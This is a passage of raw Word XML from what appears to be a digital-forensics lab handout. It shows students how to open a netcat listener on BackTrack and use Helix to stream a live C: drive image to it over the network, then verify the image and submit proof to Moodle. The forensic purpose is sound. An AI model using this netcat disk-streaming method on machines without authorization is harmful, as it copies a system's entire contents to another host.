          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verify Image Byte Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591931B7" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEEEA11" w14:textId="36951A24" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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ls -l WV01_PM_fake_virus.dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7759E64E" w14:textId="0B16E913" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA7B847" wp14:editId="737F200E">
            <wp:extent cx="5943465" cy="5717540"/>
            <wp:effectExtent l="0" t="0" r="63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112" cy="5728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AEBAD" w14:textId="0B3EEB5F" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F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Section 11. Start Up NetCat  Listener To Receive Hard Drive Image From Helix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D843FA" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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2611BBC8" w14:textId="0E591F19" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Start Up Netcat on BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DA327" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048CB2F" w14:textId="77777777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cd /FORENSICS/images/1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A7B6E0" w14:textId="77777777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nc -l -vvv -p 8888 &gt; WV01_HD_fake_virus.dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241F58F6" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Netcat will listen for Helix to send the Hard Drive Image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4A7F0" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Nothing will be sent until you complete the following section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB48499" w14:textId="04CB8279" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Continue to Next Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0AABF8" w14:textId="4CA4A6A6" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22EF6571" wp14:editId="57781DD5">
            <wp:extent cx="5943349" cy="5146040"/>
            <wp:effectExtent l="0" t="0" r="635" b="101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906" cy="5161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1D76A" w14:textId="57F37A35" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F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Section 12. Use Helix to Send Hard Disk Image to BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E715C7" w14:textId="60EB6077" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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1.Live Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B742B" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E47FA5" w14:textId="77777777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Click on the Camera Icon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01B79C" w14:textId="77777777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Select "C:\ (Logical drive)" from the Source Dropdown Menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED86E7" w14:textId="77777777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Select the NetCat Radio Button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D44B3" w14:textId="77777777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Destination IP: Provide BackTrack's IP Address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A217FBE" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Obtain BackTrack's IP in Section 8, Step 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E411D" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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In my case, it is 192.168.1.105.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0384CC02" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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In your case, it will be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18930D5F" w14:textId="77777777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Port: 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C74A22B" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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This is the Listening NetCat Port on the BackTrack Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A43525" w14:textId="017E2F5B" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Click Acquire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0AE17" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06838D23" w14:textId="3FB7F4A8" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D319442" wp14:editId="7A0A3016">
            <wp:extent cx="5943429" cy="4917440"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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62" cy="4923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6FCF3" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C4DA81" w14:textId="1BE19E67" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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2.Notice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFF3B9C" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493EE46" w14:textId="399ECB14" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Click Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39868A9E" w14:textId="76AF3229" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5B04BC" wp14:editId="0831A215">
            <wp:extent cx="5943600" cy="81337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3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A6849" w14:textId="3A04ED7E" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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3.Helix Informational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687FA0D1" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03496C23" w14:textId="77777777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You will see a black command prompt like below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C63802" w14:textId="77777777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Notice it will saying "Copying \\.\C to CONOUT$..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795F6E88" w14:textId="77777777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This 8GB copy will take about 30 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323AA2F" w14:textId="5D204506" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17CD58" w14:textId="1C813380" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="603BA6FF" wp14:editId="50CC708A">
            <wp:extent cx="5943512" cy="5603240"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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619" cy="5608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59E46" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1285AC04" w14:textId="77D57D47" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F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Section 13. Verify Hard Drive Image on BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433F1F2" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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31C4C1AC" w14:textId="0C3EB12E" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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1.Verify Image Byte Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446AA37" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FCEBCE" w14:textId="77777777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ls -l WV01*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EEFFEC" w14:textId="77777777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date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DCE284" w14:textId="77777777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echo "Your Name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EABD5D" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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Replace the string "Your Name" with your actual name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F89B4" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="2160" w:hanging="216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i.e., echo "John Gray"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57028E0A" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Proof of Lab Instructions #2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180FF2B2" w14:textId="77777777" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B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PrtScn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5B325" w14:textId="36DE6112" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr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Paste into the previously created word document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FE9AE" w14:textId="7BB94981" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A4D01B3" wp14:editId="58F67247">
            <wp:extent cx="5943233" cy="5603240"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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032" cy="56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49DB1" w14:textId="6C6247CA" w:rsidR="004D72B5" w:rsidRPr="00D7332F" w:rsidRDefault="004D72B5" w:rsidP="004D72B5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D7332F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Section 14. Proof of Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36094092" w14:textId="77777777" w:rsidR="006B744B" w:rsidRPr="00D7332F" w:rsidRDefault="006B744B" w:rsidP="006B744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Proof of Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFEE7B3" w14:textId="77777777" w:rsidR="006B744B" w:rsidRPr="00D7332F" w:rsidRDefault="006B744B" w:rsidP="006B744B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b/>
          <w:bCs/>
          <w:color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B7C85" w14:textId="77777777" w:rsidR="006B744B" w:rsidRPr="00D7332F" w:rsidRDefault="006B744B" w:rsidP="006B744B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Proof of Lab Instructions #1 (See Section 7, Step 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4C086" w14:textId="77777777" w:rsidR="006B744B" w:rsidRPr="00D7332F" w:rsidRDefault="006B744B" w:rsidP="006B744B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ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Proof of Lab Instructions #2 (See Section 13, Step 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B094A7" w14:textId="1D4AB617" w:rsidR="006B744B" w:rsidRPr="00D7332F" w:rsidRDefault="006B744B" w:rsidP="006B744B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Submit to Moodle.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006B744B" w:rsidRPr="00D7332F" w:rsidSect="00976E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DFCE6BFE"/>
    <w:lvl w:ilvl="0" w:tplc="00000001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="00000002">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="00000003">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr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decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="00000066">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="00000067">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr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1022EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97FA01EE"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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4606BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCFABA2A"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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0469A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B305912"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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172BC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D92EEF2"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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F970A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5966049E"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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DC47E02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EACC12B4"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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F352FA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54B2BCC2"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1460" w:hanging="38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6086346E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37041180"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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23702D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EAAAF08"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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8727542"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="888833AC"/>
    <w:lvl w:ilvl="0" w:tplc="5254E21C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="740" w:hanging="38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11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7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2B92"/>
    <w:rsid w:val="00062B92"/>
    <w:rsid w:val="001602AE"/>
    <w:rsid w:val="001B1CE7"/>
